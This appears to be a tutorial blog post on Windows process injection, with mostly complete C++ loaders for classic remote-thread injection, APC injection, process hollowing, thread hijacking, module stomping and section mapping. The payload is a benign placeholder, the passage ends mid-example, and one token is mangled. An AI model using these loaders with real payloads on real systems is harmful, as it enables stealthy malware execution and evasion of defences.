Ever wondered how attackers manage to sneak their malicious code into running programs without triggering alarms? The answer often lies in a sophisticated technique called in-memory code injection, and at its heart is a powerful concept known as shellcode.
What Exactly is Shellcode?
Imagine a tiny, self-contained program, stripped down to its bare essentials, designed to perform a very specific task. That’s shellcode. It’s a set of raw CPU instructions, usually written in assembly language, that gets executed after a vulnerability is successfully exploited. Unlike regular Windows executables, shellcode is lean and mean – it doesn’t have fancy headers or sections. Its magic lies in its Position Independent Code (PIC) nature, meaning it can run perfectly no matter where it lands in memory. Its ultimate goal? To directly manipulate your computer’s brain (CPU registers) and call system functions, often to open a backdoor, gain control, or perform other covert actions.
The Stealthy Dance of Code Injection
The act of injecting and executing shellcode in memory is like a digital stealth operation. Malicious code is secretly slipped into the memory space of another running process, and then that process is tricked into executing it. Why do attackers bother with this elaborate dance? For several compelling reasons:
- Evading Defenses: Hiding from antivirus and other security tools.
- Privilege Escalation: Gaining higher access rights than they normally have.
- Altering Functionality: Modifying how a legitimate program behaves.
The General Playbook for Code Injection
While the methods can get intricate, the core steps of code injection generally follow this pattern:
- Locate the Target Process: First, the attacker needs to pick a target – any running process will do, or a specific one like
explorer.exeorsvchost.exe. Tools likeCreateToolhelp32Snapshothelp them find their mark. - Allocate Memory in the Target Process: Next, they carve out a hidden space within the target process’s virtual memory using APIs like
VirtualAllocExorNtAllocateVirtualMemory. - Write the Code to the Allocated Memory: The shellcode or other malicious payload is then secretly copied from the attacker’s process into this newly created memory using functions like
WriteProcessMemoryorNtWriteVirtualMemory. - Execute the Injected Code: Finally, the attacker redirects the target process’s execution flow to their injected code, often by creating a new thread that starts running the shellcode.
Conceptual Code Examples & Explanations
IMPORTANT DISCLAIMER
The following code examples are provided for EDUCATIONAL AND RESEARCH PURPOSES ONLY. Understanding these techniques is crucial for developing defensive strategies, but DO NOT use this information or code for any malicious activities. Unauthorized access to or modification of computer systems is illegal and unethical. You are solely responsible for your actions. These examples are simplified, may be detected by security software, and are intended to demonstrate core logic, not to be fully functional attack tools.
Shellcode Placeholder
For these examples, we’ll use a generic, benign shellcode placeholder. In a real attack, this would be the actual malicious payload. This placeholder consists of NOP (No Operation) instructions, an INT3 (debug breakpoint), and a RET (Return) instruction.
// Shellcode placeholder
unsigned char shellcode[] = {
0x90, // NOP
0x90, // NOP
0x90, // NOP
0xCC, // INT3 (Debug Breakpoint)
0xC3 // RET (Return)
};
General Notes for All Examples:
- Error Handling: For brevity, most error handling (checking return values of API calls, etc.) is omitted or indicated by comments. In real-world code, robust error handling is essential.
- Process ID (PID): Examples requiring a target process ID (PID) will assume
targetPIDis already obtained. You would typically use functions likeCreateToolhelp32Snapshot,Process32First, andProcess32Nextto find the PID of a target process by its name. The dummygetTargetPIDandgetFirstThreadIDfunctions are illustrative. - Permissions: Many of these operations require appropriate process permissions (e.g.,
PROCESS_ALL_ACCESS). The attacking process might need administrative privileges. - 32-bit vs. 64-bit: While the API names are often the same, pointer sizes, structure layouts (like
CONTEXT), and assembly instructions will differ between 32-bit and 64-bit architectures. These examples are conceptually C++ and try to be architecture-agnostic at the API call level where possible, but specific implementations would need to account for the target architecture (e.g.,EipvsRipinCONTEXT). - Nt* APIs: Using
Nt*APIs (Native APIs) often involves dynamically loadingntdll.dllusingLoadLibraryAorLoadLibraryWand then retrieving the function addresses usingGetProcAddress. This is shown in some examples but is a necessary step for direct native API calls. - Compilation: To compile these C++ examples, you’d use a compiler like MinGW (g++) or MSVC (cl.exe) and link against necessary libraries (e.g.,
kernel32.lib,user32.lib,ntdll.libas needed). Include headers like<windows.h>,<iostream>,<tlhelp32.h>, and<winternl.h>.
Beyond the Basics: Advanced Code Injection Techniques
Attackers have a whole arsenal of techniques to achieve in-memory code injection, each with its own nuances and stealth capabilities. Let’s explore some of the most common ones with conceptual code examples:
1. Classical Shellcode Injection: The Foundation
This is the most straightforward approach, following the general steps outlined above. It uses standard Windows APIs like OpenProcess, VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread to get the job done. Because shellcode lacks the structure of a normal executable, it handles all the necessary setup and API calls internally.
Conceptual C/C++ Code Example:
#include <windows.h>
#include <iostream>
// Shellcode defined globally or included
unsigned char shellcode[] = { 0x90, 0x90, 0x90, 0xCC, 0xC3 };
// Dummy function to simulate obtaining a PID
DWORD getTargetPID(const wchar_t* targetProcessName) {
// In a real scenario, implement this using CreateToolhelp32Snapshot, Process32First, Process32Next
std::wcout << L"INFO: Replace getTargetPID with actual process enumeration for " << targetProcessName << std::endl;
// For demonstration, find PID of an existing process like "notepad.exe"
// This part needs to be implemented to find a real PID.
// Example: return findProcessIdByName(L"notepad.exe");
HWND hwnd = FindWindowW(L"Notepad", NULL); // Example for Notepad
if (hwnd) {
DWORD pid;
GetWindowThreadProcessId(hwnd, &pid);
std::wcout << L"Found Notepad PID: " << pid << std::endl;
return pid;
}
std::wcerr << L"Target process " << targetProcessName << L" not found for PID." << std::endl;
return 0; // Placeholder if not found
}
int main_classical_injection() {
DWORD targetPID = getTargetPID(L"notepad.exe"); // Example: Target Notepad
if (targetPID == 0) {
std::cerr << "Target process PID not obtained. Exiting." << std::endl;
return 1;
}
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPID);
if (hProcess == NULL) {
std::cerr << "Failed to open target process. Error: " << GetLastError() << std::endl;
return 1;
}
std::cout << "Target process opened successfully." << std::endl;
LPVOID pRemoteMem = VirtualAllocEx(hProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pRemoteMem == NULL) {
std::cerr << "Failed to allocate memory in target process. Error: " << GetLastError() << std::endl;
CloseHandle(hProcess);
return 1;
}
std::cout << "Memory allocated in target process at: " << pRemoteMem << std::endl;
if (!WriteProcessMemory(hProcess, pRemoteMem, shellcode, sizeof(shellcode), NULL)) {
std::cerr << "Failed to write shellcode to target process. Error: " << GetLastError() << std::endl;
VirtualFreeEx(hProcess, pRemoteMem, 0, MEM_RELEASE);
CloseHandle(hProcess);
return 1;
}
std::cout << "Shellcode written to target process memory." << std::endl;
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteMem, NULL, 0, NULL);
if (hThread == NULL) {
std::cerr << "Failed to create remote thread in target process. Error: " << GetLastError() << std::endl;
VirtualFreeEx(hProcess, pRemoteMem, 0, MEM_RELEASE);
CloseHandle(hProcess);
return 1;
}
std::cout << "Remote thread created. Shellcode should execute." << std::endl;
// Optional: Wait for the thread to finish and clean up
// WaitForSingleObject(hThread, INFINITE);
// CloseHandle(hThread);
// VirtualFreeEx(hProcess, pRemoteMem, 0, MEM_RELEASE); // Usually, memory is freed by the shellcode or left
// CloseHandle(hProcess);
// For cleanup in this PoC, we'll close handles.
// Memory cleanup in a real scenario depends on shellcode behavior.
if (hThread) CloseHandle(hThread);
// If shellcode doesn't self-delete or if VirtualFreeEx is intended after execution (requires hThread completion)
// VirtualFreeEx(hProcess, pRemoteMem, 0, MEM_RELEASE);
if (hProcess) CloseHandle(hProcess);
// Call this main in your actual main() function if you want to run it.
// Example: int main() { return main_classical_injection(); }
return 0;
}
2. APC Queue Code Injection: Abusing Asynchronous Calls
This clever technique exploits Windows’ Asynchronous Procedure Call (APC) mechanism. Attackers write their shellcode to the target process’s memory and then queue it as an APC for one or more target threads using QueueUserAPC or NtQueueApcThread. When the target thread enters an “alertable” state (e.g., waiting for an event), it checks its APC queue and surprise! executes the malicious shellcode. “Early Bird” APC injection is a particularly stealthy variation.
Conceptual C/C++ Code Example:
#include <windows.h>
#include <iostream>
#include <tlhelp32.h> // For thread enumeration
// Shellcode defined globally or included
// unsigned char shellcode[] = { 0x90, 0x90, 0x90, 0xCC, 0xC3 };
// Dummy PID function (e.g., getTargetPID from previous example)
// Function to get the first thread ID of a process
DWORD getFirstThreadID(DWORD dwProcessID) {
HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
if (hSnap == INVALID_HANDLE_VALUE) {
std::cerr << "CreateToolhelp32Snapshot (threads) failed. Error: " << GetLastError() << std::endl;
return 0;
}
THREADENTRY32 te32;
te32.dwSize = sizeof(THREADENTRY32);
if (Thread32First(hSnap, &te32)) {
do {
if (te32.th32OwnerProcessID == dwProcessID) {
CloseHandle(hSnap);
std::cout << "Found thread ID: " << te32.th32ThreadID << " for PID: " << dwProcessID << std::endl;
return te32.th32ThreadID;
}
} while (Thread32Next(hSnap, &te32));
}
std::cerr << "Could not find a thread for PID: " << dwProcessID << std::endl;
CloseHandle(hSnap);
return 0; // No thread found or error
}
int main_apc_injection() {
DWORD targetPID = getTargetPID(L"notepad.exe"); // Example target
if (targetPID == 0) {
std::cerr << "Target process PID not obtained for APC injection. Exiting." << std::endl;
return 1;
}
DWORD targetThreadID = getFirstThreadID(targetPID);
if (targetThreadID == 0) {
std::cerr << "Failed to find a thread in the target process for APC injection." << std::endl;
return 1;
}
HANDLE hProcess = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, targetPID);
if (hProcess == NULL) {
std::cerr << "Failed to open target process for APC. Error: " << GetLastError() << std::endl;
return 1;
}
LPVOID pRemoteMem = VirtualAllocEx(hProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pRemoteMem == NULL) {
std::cerr << "VirtualAllocEx failed for APC. Error: " << GetLastError() << std::endl;
CloseHandle(hProcess);
return 1;
}
if (!WriteProcessMemory(hProcess, pRemoteMem, shellcode, sizeof(shellcode), NULL)) {
std::cerr << "WriteProcessMemory failed for APC. Error: " << GetLastError() << std::endl;
VirtualFreeEx(hProcess, pRemoteMem, 0, MEM_RELEASE);
CloseHandle(hProcess);
return 1;
}
HANDLE hThread = OpenThread(THREAD_SET_CONTEXT, FALSE, targetThreadID);
// THREAD_SET_CONTEXT is required for QueueUserAPC.
// Alternatively, THREAD_ALL_ACCESS, but be mindful of least privilege.
if (hThread == NULL) {
std::cerr << "Failed to open target thread for APC. Error: " << GetLastError() << std::endl;
VirtualFreeEx(hProcess, pRemoteMem, 0, MEM_RELEASE);
CloseHandle(hProcess);
return 1;
}
if (QueueUserAPC((PAPCFUNC)pRemoteMem, hThread, NULL) == 0) {
std::cerr << "Failed to queue APC. Error: " << GetLastError() << std::endl;
} else {
std::cout << "APC queued successfully to thread " << targetThreadID << "." << std::endl;
std::cout << "Shellcode at " << pRemoteMem << " will execute when the thread enters an alertable state." << std::endl;
}
// Memory (pRemoteMem) is not freed here immediately as it's needed for APC execution.
// Proper cleanup is context-dependent.
CloseHandle(hThread);
CloseHandle(hProcess);
// VirtualFreeEx(hProcess, pRemoteMem, 0, MEM_RELEASE); // This would be done after confirming execution.
return 0;
}
3. Process Hollowing: The Ghost in the Machine
Imagine creating a legitimate process, then literally “hollowing out” its original code by unmapping its memory sections. That’s process hollowing. Malicious code is then written into the empty space, and the legitimate process’s main thread is resumed, but now it’s executing the injected code. This makes the malicious code run under the guise of a legitimate process name, making it harder to spot.
Conceptual C/C++ Code Example:
#include <windows.h>
#include <iostream>
#include <winternl.h> // For PEB and NtQueryInformationProcess, PROCESS_BASIC_INFORMATION
// Shellcode defined globally or included
// unsigned char shellcode[] = { 0x90, 0x90, 0x90, 0xCC, 0xC3 };
// Define NtQueryInformationProcess and NtUnmapViewOfSection if not available or for clarity
typedef NTSTATUS(WINAPI* PNTQUERYINFORMATIONPROCESS)(
HANDLE ProcessHandle,
PROCESSINFOCLASS ProcessInformationClass,
PVOID ProcessInformation,
ULONG ProcessInformationLength,
PULONG ReturnLength
);
typedef NTSTATUS(WINAPI* PNTUNMAPVIEWOFSECTION)(
HANDLE ProcessHandle,
PVOID BaseAddress
);
int main_process_hollowing() {
wchar_t targetPath[MAX_PATH];
GetSystemDirectoryW(targetPath, MAX_PATH); // Get System32 path
wcscat_s(targetPath, MAX_PATH, L"\\notepad.exe"); // Target a common legitimate process
STARTUPINFOW si = { sizeof(si) };
PROCESS_INFORMATION pi;
if (!CreateProcessW(NULL, targetPath, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) {
std::cerr << "Failed to create suspended process (" << targetPath << "). Error: " << GetLastError() << std::endl;
return 1;
}
std::wcout << L"Process " << targetPath << L" created in suspended state (PID: " << pi.dwProcessId << L")" << std::endl;
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
PNTQUERYINFORMATIONPROCESS pNtQueryInformationProcess = (PNTQUERYINFORMATIONPROCESS)GetProcAddress(hNtdll, "NtQueryInformationProcess");
PNTUNMAPVIEWOFSECTION pNtUnmapViewOfSection = (PNTUNMAPVIEWOFSECTION)GetProcAddress(hNtdll, "NtUnmapViewOfSection");
if (!pNtQueryInformationProcess || !pNtUnmapViewOfSection) {
std::cerr << "Failed to get native API function pointers for hollowing." << std::endl;
TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hProcess); CloseHandle(pi.hThread);
return 1;
}
PROCESS_BASIC_INFORMATION pbi;
ULONG returnLength;
NTSTATUS status = pNtQueryInformationProcess(pi.hProcess, ProcessBasicInformation, &pbi, sizeof(pbi), &returnLength);
if (!NT_SUCCESS(status)) {
std::cerr << "NtQueryInformationProcess failed. Status: " << std::hex << status << std::endl;
TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hProcess); CloseHandle(pi.hThread);
return 1;
}
// PEB is at pbi.PebBaseAddress. ImageBase is at PEB + (offset, e.g., 0x10 for 64-bit, 0x8 for 32-bit)
// This is a simplified approach; robust parsing of PEB is needed.
// For this example, we assume image base is found and proceed with unmapping.
// Let's assume ImageBaseAddress is read from PEB.
// For simplicity, we'll try to unmap the base address found in PEB.
// A more robust solution would parse the PE header of the target to find the exact ImageBase.
PVOID imageBaseAddressFromPeb = nullptr;
SIZE_T bytesRead;
// Offset to ImageBaseAddress within PEB (example for 64-bit, adjust for 32-bit)
DWORD_PTR pebImageBaseOffset = sizeof(PVOID) * 2; // Simplified, usually 0x10 for 64bit
if (!ReadProcessMemory(pi.hProcess, (PBYTE)pbi.PebBaseAddress + pebImageBaseOffset, &imageBaseAddressFromPeb, sizeof(PVOID), &bytesRead) || bytesRead != sizeof(PVOID)) {
std::cerr << "Failed to read ImageBaseAddress from PEB. Error: " << GetLastError() << std::endl;
// Fallback: try to unmap pi.hProcess's supposed base if PEB read fails. This is less reliable.
// imageBaseAddressFromPeb = (PVOID) some_guessed_base; // Not recommended
}
// If imageBaseAddressFromPeb is successfully read, try to unmap it.
// This is the "hollowing" part.
if (imageBaseAddressFromPeb) {
status = pNtUnmapViewOfSection(pi.hProcess, imageBaseAddressFromPeb);
if (!NT_SUCCESS(status)) {
std::cerr << "NtUnmapViewOfSection failed. Status: " << std::hex << status << ". This might be okay if no image was mapped there or due to protections." << std::endl;
// Continue anyway, as VirtualAllocEx might still work.
} else {
std::cout << "Original image unmapped (hollowed) successfully from " << imageBaseAddressFromPeb << std::endl;
}
} else {
std::cerr << "Could not determine image base from PEB to unmap. Proceeding with allocation." << std::endl;
}
// Allocate memory for our shellcode, preferably at the original image base if unmapped.
LPVOID pRemoteMem = VirtualAllocEx(pi.hProcess, imageBaseAddressFromPeb, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pRemoteMem == NULL) { // If allocation at original base fails, try anywhere
pRemoteMem = VirtualAllocEx(pi.hProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
}
if (pRemoteMem == NULL) {
std::cerr << "Failed to allocate memory in hollowed process. Error: " << GetLastError() << std::endl;
TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hProcess); CloseHandle(pi.hThread);
return 1;
}
std::cout << "Memory for shellcode allocated at: " << pRemoteMem << std::endl;
if (!WriteProcessMemory(pi.hProcess, pRemoteMem, shellcode, sizeof(shellcode), NULL)) {
std::cerr << "Failed to write shellcode to hollowed process. Error: " << GetLastError() << std::endl;
VirtualFreeEx(pi.hProcess, pRemoteMem, 0, MEM_RELEASE);
TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hProcess); CloseHandle(pi.hThread);
return 1;
}
CONTEXT context;
context.ContextFlags = CONTEXT_CONTROL; // For Eip/Rip
if (!GetThreadContext(pi.hThread, &context)) {
std::cerr << "GetThreadContext failed. Error: " << GetLastError() << std::endl;
/* cleanup */ return 1;
}
#ifdef _WIN64
context.Rip = (DWORD64)pRemoteMem; // Point RIP to our shellcode
#else
context.Eip = (DWORD)pRemoteMem; // Point EIP to our shellcode
#endif
if (!SetThreadContext(pi.hThread, &context)) {
std::cerr << "Failed to set thread context. Error: " << GetLastError() << std::endl;
VirtualFreeEx(pi.hProcess, pRemoteMem, 0, MEM_RELEASE);
TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hProcess); CloseHandle(pi.hThread);
return 1;
}
std::cout << "Thread context updated to point to shellcode." << std::endl;
if (ResumeThread(pi.hThread) == (DWORD)-1) {
std::cerr << "Failed to resume thread. Error: " << GetLastError() << std::endl;
} else {
std::cout << "Process resumed. Shellcode should be executing under guise of " << targetPath << std::endl;
}
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return 0;
}
4. Thread Hijacking: Taking Control of an Existing Thread
Why create a new thread when you can hijack an existing one? This technique involves taking control of an active thread in the target process. The attacker suspends the thread, allocates memory, writes the shellcode, modifies the thread’s execution context (its Instruction Pointer) to point to the shellcode, and then resumes the thread. The hijacked thread then dutifully executes the malicious code.
Conceptual C/C++ Code Example:
#include <windows.h>
#include <iostream>
#include <tlhelp32.h> // For thread enumeration
// Shellcode defined globally or included
// unsigned char shellcode[] = { 0x90, 0x90, 0x90, 0xCC, 0xC3 };
// Dummy PID and ThreadID functions (e.g., getTargetPID, getFirstThreadID from previous examples)
int main_thread_hijacking() {
DWORD targetPID = getTargetPID(L"notepad.exe"); // Example target
if (targetPID == 0) {
std::cerr << "Target PID not obtained for thread hijacking." << std::endl;
return 1;
}
DWORD targetThreadID = getFirstThreadID(targetPID); // Get a thread to hijack
if (targetThreadID == 0) {
std::cerr << "Failed to find a thread to hijack in target process." << std::endl;
return 1;
}
std::cout << "Attempting to hijack thread ID: " << targetThreadID << " in PID: " << targetPID << std::endl;
// THREAD_ALL_ACCESS is broad; specific permissions:
// THREAD_SUSPEND_RESUME, THREAD_GET_CONTEXT, THREAD_SET_CONTEXT, THREAD_QUERY_INFORMATION
HANDLE hThread = OpenThread(THREAD_SUSPEND_RESUME | THREAD_GET_CONTEXT | THREAD_SET_CONTEXT, FALSE, targetThreadID);
if (hThread == NULL) {
std::cerr << "Failed to open target thread. Error: " << GetLastError() << std::endl;
return 1;
}
if (SuspendThread(hThread) == (DWORD)-1) {
std::cerr << "Failed to suspend target thread. Error: " << GetLastError() << std::endl;
CloseHandle(hThread);
return 1;
}
std::cout << "Target thread " << targetThreadID << " suspended." << std::endl;
HANDLE hProcess = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, targetPID);
if (hProcess == NULL) {
std::cerr << "Failed to open target process for memory ops. Error: " << GetLastError() << std::endl;
ResumeThread(hThread); CloseHandle(hThread);
return 1;
}
LPVOID pRemoteMem = VirtualAllocEx(hProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pRemoteMem == NULL) {
std::cerr << "VirtualAllocEx failed for hijacking. Error: " << GetLastError() << std::endl;
ResumeThread(hThread); CloseHandle(hThread); CloseHandle(hProcess);
return 1;
}
if (!WriteProcessMemory(hProcess, pRemoteMem, shellcode, sizeof(shellcode), NULL)) {
std::cerr << "WriteProcessMemory failed for hijacking. Error: " << GetLastError() << std::endl;
VirtualFreeEx(hProcess, pRemoteMem, 0, MEM_RELEASE);
ResumeThread(hThread); CloseHandle(hThread); CloseHandle(hProcess);
return 1;
}
std::cout << "Shellcode written to " << pRemoteMem << std::endl;
CONTEXT context;
context.ContextFlags = CONTEXT_CONTROL; // For Eip/Rip
if (!GetThreadContext(hThread, &context)) {
std::cerr << "GetThreadContext failed. Error: " << GetLastError() << std::endl;
VirtualFreeEx(hProcess, pRemoteMem, 0, MEM_RELEASE);
ResumeThread(hThread); CloseHandle(hThread); CloseHandle(hProcess);
return 1;
}
// Save original EIP/RIP if you plan to restore it later (complex: requires more shellcode logic)
#ifdef _WIN64
// DWORD64 originalRip = context.Rip; // Save original RIP
context.Rip = (DWORD64)pRemoteMem;
#else
// DWORD originalEip = context.Eip; // Save original EIP
context.Eip = (DWORD)pRemoteMem;
#endif
if (!SetThreadContext(hThread, &context)) {
std::cerr << "SetThreadContext failed. Error: " << GetLastError() << std::endl;
VirtualFreeEx(hProcess, pRemoteMem, 0, MEM_RELEASE);
ResumeThread(hThread); // Attempt to resume to avoid leaving thread suspended
CloseHandle(hThread); CloseHandle(hProcess);
return 1;
}
std::cout << "Thread context updated. Resuming thread..." << std::endl;
if (ResumeThread(hThread) == (DWORD)-1) {
std::cerr << "Failed to resume thread. Error: " << GetLastError() << std::endl;
} else {
std::cout << "Thread resumed. Shellcode should be executing." << std::endl;
}
CloseHandle(hThread);
CloseHandle(hProcess);
// pRemoteMem is now being executed by the hijacked thread. Cleanup is complex.
return 0;
}
5. Module Stomping: Overwriting Legitimacy
This method involves injecting shellcode by overwriting a legitimate, already loaded module (like a DLL) in a target process. A benign DLL is injected, or an existing one is targeted, and then its entry point or another executable section is “stomped” over with the malicious shellcode. A new thread is then started, pointing to this overwritten entry point, or an existing function call is leveraged, making the malicious code appear to be part of a legitimate module.
Conceptual C/C++ Code Example:
#include <windows.h>
#include <iostream>
#include <tlhelp32.h> // For module enumeration
#include <string> // For _wcsicmp
// Shellcode defined globally or included
// unsigned char shellcode[] = { 0x90, 0x90, 0x90, 0xCC, 0xC3 };
// Dummy PID function (e.g., getTargetPID from previous examples)
MODULEENTRY32W getRemoteModuleInfo(DWORD targetPID, const wchar_t* moduleName) {
HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE | TH32CS_SNAPMODULE32, targetPID);
MODULEENTRY32W me32 = {0}; // Use W version for wide strings
me32.dwSize = sizeof(MODULEENTRY32W);
if (hSnap == INVALID_HANDLE_VALUE) {
std::cerr << "CreateToolhelp32Snapshot (modules) failed: " << GetLastError() << std::endl;
return me32; // Return empty struct
}
if (Module32FirstW(hSnap, &me32)) {
do {
if (_wcsicmp(me32.szModule, moduleName) == 0) { // Case-insensitive comparison
CloseHandle(hSnap);
std::wcout << L"Found module: " << me32.szModule << L" at base: " << me32.modBaseAddr << std::endl;
return me32;
}
} while (Module32NextW(hSnap, &me32));
}
std::wcerr << L"Module " << moduleName << L" not found in PID: " << targetPID << std::endl;
CloseHandle(hSnap);
return me32; // Return empty if not found (me32.modBaseAddr will be 0)
}
int main_module_stomping() {
DWORD targetPID = getTargetPID(L"notepad.exe"); // Example target
// Be VERY careful choosing a module. Stomping critical system DLLs will likely crash the system or process.
// For PoC, a non-critical DLL or one known to have unused executable space might be chosen.
// Example: L"user32.dll" or a less common DLL.
// Using kernelbase.dll is risky but often loaded.
const wchar_t* targetModule = L"kernelbase.dll"; // Example: a commonly loaded DLL.
if (targetPID == 0) {
std::cerr << "Target PID not obtained for module stomping." << std::endl;
return 1;
}
MODULEENTRY32W me32 = getRemoteModuleInfo(targetPID, targetModule);
if (me32.modBaseAddr == NULL) {
std::wcerr << L"Target module " << targetModule << L" not found in target process." << std::endl;
return 1;
}
// For simplicity, we'll try to stomp at an offset from the base.
// A real attack would parse PE headers to find .text section or a specific function.
// DllEntryPoint is at an offset specified in PE Optional Header.
// Here, we just pick an arbitrary small offset into the module for PoC.
// Ensure this offset is within an EXECUTABLE section of the module.
LPVOID targetAddressToStomp = (LPVOID)((DWORD_PTR)me32.modBaseAddr + 0x1000); // Example offset
// This offset MUST point to an executable region and be large enough for the shellcode.
std::wcout << L"Attempting to stomp module " << targetModule << L" at address " << targetAddressToStomp << std::endl;
HANDLE hProcess = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ | PROCESS_CREATE_THREAD, FALSE, targetPID);
if (hProcess == NULL) {
std::cerr << "Failed to open target process for stomping. Error: " << GetLastError() << std::endl;
return 1;
}
DWORD oldProtect;
if (!VirtualProtectEx(hProcess, targetAddressToStomp, sizeof(shellcode), PAGE_EXECUTE_READWRITE, &oldProtect)) {
std::cerr << "Failed to change memory protection for stomping. Error: " << GetLastError() << std::endl;
std::cerr << "Ensure the target address " << targetAddressToStomp << " is valid and part of the module." << std::endl;
CloseHandle(hProcess);
return 1;
}
std::cout << "Memory protection changed to RWX." << std::endl;
if (!WriteProcessMemory(hProcess, targetAddressToStomp, shellcode, sizeof(shellcode), NULL)) {
std::cerr << "Failed to write shellcode (stomp). Error: " << GetLastError() << std::endl;
VirtualProtectEx(hProcess, targetAddressToStomp, sizeof(shellcode), oldProtect, &oldProtect); // Revert protection
CloseHandle(hProcess);
return 1;
}
std::cout << "Module stomping: Wrote shellcode to " << targetAddressToStomp << "." << std::endl;
// To execute, you could create a remote thread pointing to targetAddressToStomp
std::cout << "Creating remote thread to execute stomped code..." << std::endl;
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)targetAddressToStomp, NULL, 0, NULL);
if (hThread == NULL) {
std::cerr << "Failed to create remote thread for stomped code. Error: " << GetLastError() << std::endl;
} else {
std::cout << "Remote thread created. Stomped shellcode should execute." << std::endl;
// WaitForSingleObject(hThread, INFINITE); // Optional: wait for shellcode
CloseHandle(hThread);
}
// Revert memory protection (important for stability if the original code is still needed)
// This might make the shellcode non-executable again.
// If shellcode is one-shot, this is good. If it needs to persist, RWX must remain.
// std::cout << "Reverting memory protection..." << std::endl;
// if (!VirtualProtectEx(hProcess, targetAddressToStomp, sizeof(shellcode), oldProtect, &oldProtect)) {
// std::cerr << "Failed to revert memory protection. Error: " << GetLastError() << std::endl;
// }
CloseHandle(hProcess);
return 0;
}
6. NtCreateSection + NtMapViewOfSection: Shared Memory Stealth
This native API-based technique leverages memory sections for stealth. Attackers create a shared memory section and map views of it into both their own process and the target process. Shellcode is written to the local mapped view, and thanks to the shared nature of the section, it automatically appears in the target process’s mapped view. A remote thread is then created in the target process to execute the shellcode. This method avoids the often-monitored WriteProcessMemory API.
Conceptual C/C++ Code Example:
#include <windows.h>
#include <iostream>
#include <winternl.h> // For NTSTATUS, OBJECT_ATTRIBUTES, UNICODE_STRING etc.
// Shellcode defined globally or included
// unsigned char shellcode[] = { 0x90, 0x90, 0x90, 0xCC, 0xC3 };
// Dummy PID function (e.g., getTargetPID from previous examples)
// Signatures for NtCreateSection and NtMapViewOfSection
typedef NTSTATUS(NTAPI* PFNtCreateSection)(
OUT PHANDLE SectionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN PLARGE_INTEGER MaximumSize OPTIONAL,
IN ULONG SectionPageProtection,
IN ULONG AllocationAttributes,
IN HANDLE FileHandle OPTIONAL
);
typedef NTSTATUS(NTAPI* PFNtMapViewOfSection)(
HANDLE SectionHandle,
HANDLE ProcessHandle,
PVOID* BaseAddress,
ULONG_PTR ZeroBits,
SIZE_T CommitSize,
PLARGE_INTEGER SectionOffset OPTIONAL,
PSIZE_T ViewSize,
SECTION_INHERIT InheritDisposition, // Changed from DWORD to SECTION_INHERIT enum
ULONG AllocationType,
ULONG Win32Protect
);
// Not strictly needed for anonymous sections, but good practice for named ones.
// For this example, ObjectAttributes will be NULL for an anonymous section.
// VOID InitializeObjectAttributes(
// POBJECT_ATTRIBUTES p,
// PUNICODE_STRING n,
// ULONG a,
// HANDLE r,
// PSECURITY_DESCRIPTOR s
// ) {
// p->Length = sizeof(OBJECT_ATTRIBUTES);
// p->RootDirectory = r;
// p->Attributes = a;
// p->ObjectName = n;
// p->SecurityDescriptor = s;
// p->SecurityQualityOfService = NULL;
// }
int main_section_injection() {
DWORD targetPID = getTargetPID(L"notepad.exe");
if (targetPID == 0) {
std::cerr << "Target PID not obtained for section injection." << std::endl;
return 1;
}
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
if (hNtdll == NULL) {
std::cerr << "Failed to get handle to ntdll.dll. Error: " << GetLastError() << std::endl;
return 1;
}
PFNtCreateSection pNtCreateSection = (PFNtCreateSection)GetProcAddress(hNtdll, "NtCreateSection");
PFNtMapViewOfSection pNtMapViewOfSection = (PFNtMapViewOfSection)GetProcAddress(hNtdll, "NtMapViewOfSection");
if (!pNtCreateSection || !pNtMapViewOfSection) {
std::cerr << "Failed to get Native API function pointers for section mapping." << std::endl;
return 1;
}
HANDLE hProcess = OpenProcess(PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD | PROCESS_DUP_HANDLE, FALSE, targetPID);
// PROCESS_DUP_HANDLE might be needed if section handle is to be duplicated, but mapping often works without it.
// PROCESS_VM_OPERATION for NtMapViewOfSection in remote process.
if (hProcess == NULL) {
std::cerr << "Failed to open target process for section injection. Error: " << GetLastError() << std::endl;
return 1;
}
HANDLE hSection = NULL;
LARGE_INTEGER sectionSize;
sectionSize.QuadPart = sizeof(shellcode); // Size of our shellcode
// For an anonymous section, ObjectAttributes can be NULL.
// OBJECT_ATTRIBUTES oa;
// InitializeObjectAttributes(&oa, NULL, 0, NULL, NULL);
NTSTATUS status = pNtCreateSection(
&hSection,
SECTION_ALL_ACCESS, // Request full access for mapping RWX
NULL, // POBJECT_ATTRIBUTES (NULL for anonymous)
§ionSize,
PAGE_EXECUTE_READWRITE, // Protection for the section itself
SEC_COMMIT, // Allocation attributes (commit memory)
